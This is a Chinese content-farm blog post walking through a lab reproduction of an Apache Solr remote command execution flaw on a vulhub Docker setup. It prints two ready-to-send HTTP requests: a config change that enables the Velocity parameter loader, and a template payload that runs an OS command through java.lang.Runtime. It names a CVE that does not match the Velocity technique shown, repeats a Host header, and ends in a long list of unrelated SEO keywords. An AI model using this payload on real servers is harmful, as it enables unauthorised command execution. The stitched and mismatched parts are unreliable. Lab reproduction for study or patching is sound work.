Apache Solr远程命令如何进行执行复现
发表于:2024-10-24 作者:千家信息网编辑
千家信息网最后更新 2024年10月24日,这篇文章给大家介绍Apache Solr远程命令如何进行执行复现,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。蹭个热度,复现一波:Apache Solr远程命令执行漏洞。环境可以
千家信息网最后更新 2024年10月24日Apache Solr远程命令如何进行执行复现
这篇文章给大家介绍Apache Solr远程命令如何进行执行复现,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。
蹭个热度,复现一波:Apache Solr远程命令执行漏洞。
环境可以使用/vulhub/solr/CVE-2019-0193/的环境,进入目录后直接 docker-compose up -d 如下:
接着访问对应地址可以看到,搭建好的镜像是没有集合的,所以我们需要自行创建一个集合:
通过 docker exec -it 容器ID /bin/bash 进入容器后执行:./solr create -c solr_sample 创建集合如下:
可以从重新浏览器访问一下solr admin,查看集合是否创建成功:
确认成功后即可先通过bp向对应路径发送请求修改params.resource.loader.enabled配置为true,请求如下:
修改完配置以后通过poc即可执行任意命令如图:
相关poc如下:
//修改配置poc
POST /solr/集合名/config HTTP/1.1
Host: 192.168.119.134:8983
Content-Length: 259
{
"update-queryresponsewriter": {
"startup": "lazy",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir": "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
}
}
//远程代码执行poc
GET /solr/solr_sample/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27ls%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
Host: localhost:8983
Host: 192.168.119.134:8983
Content-Length: 0
关于Apache Solr远程命令如何进行执行复现就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。
命令
配置
成功
内容
容器
更多
环境
帮助
不错
代码
兴趣
地址
小伙
小伙伴
文章
浏览器
漏洞
热度
目录
知识
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
助听器软件开发
西安新华互联网科技
苏州高性能服务器供应商家
软件开发模型 测试模型
网络安全等级要多少钱
命运2哪个服务器不卡
益盟操盘手 服务器
上位机软件开发知乎
服务器装哪个浏览器
数据库的字段名学生性别
数据库百分之10
吉林创新服务器供应公司
护苗网络安全远离不良信息
为什么二手服务器突然涨价
不用语句创建数据库
如何上传到sra数据库
网络安全联席会会议纪要
外贸企业服务器怎么样
邢台市软件开发培训
黑传奇服务器
k3服务器怎么分配用户
数据库技术的三个阶段
洛奇架设数据库安装失败
读取健康码用什么服务器
音乐库数据库系统
西安网络安全资料
网络安全宣传周农行
密码学与网络安全出版时间
nba2k22连接不上服务器4b代码
网络安全法4大制度